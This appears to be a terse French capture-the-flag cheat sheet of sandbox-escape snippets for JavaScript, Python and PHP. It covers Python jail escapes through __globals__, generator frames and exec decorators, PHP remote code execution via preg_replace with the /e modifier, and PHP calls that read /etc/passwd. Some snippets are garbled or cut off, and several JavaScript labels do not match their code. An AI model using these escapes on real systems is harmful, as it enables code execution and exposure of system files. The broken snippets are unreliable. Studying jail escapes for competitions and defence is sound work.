Fuck Jails

Fiche JS

// Sans lettres
[[]]+[]+!=[]

// Egalite
alert(1) == alert`1`
this == this.constructor

global.car = 'DeLorean';
this.car === global.car

// Prototype pollution
global.car = 'DeLorean';
this.car = 'Batmobile';
global.car === 'Batmobile';

// Injection de constructeur
function Car() {
  this.car = 'Batmobile'
}
const car = new Car();
car.car === 'Batmobile';

FichePyjail


(lambda:...).__globals__

# obtain builtins from generators
(_ for _ in ()).gi_frame.
(await _ for _ in ()).ag_frame.f_builtins

@exec
@input
def a():
Can be class
  pass

# walrus operator (>= python3.8)
+
[a:=().__doc__, print(a)]
-
(lambda a: print(a))(().__doc__)

Fiche PHP

// Est-ce une chaine ?
$obfs = "1"; // chaine "1"
$obfs++; // entier 2

RCE via preg_replace()
preg_replace(pattern,replace,base);
preg_replace("/a/e","phpinfo()","x")

// Peut-on lire /etc/passwd ?
file_get_contents("/etc/passwd");
readfile("/etc/passwd");
fopen("/etc/passwd","r");
include("/etc/passwd");
require_once("/etc/passwd");

Docs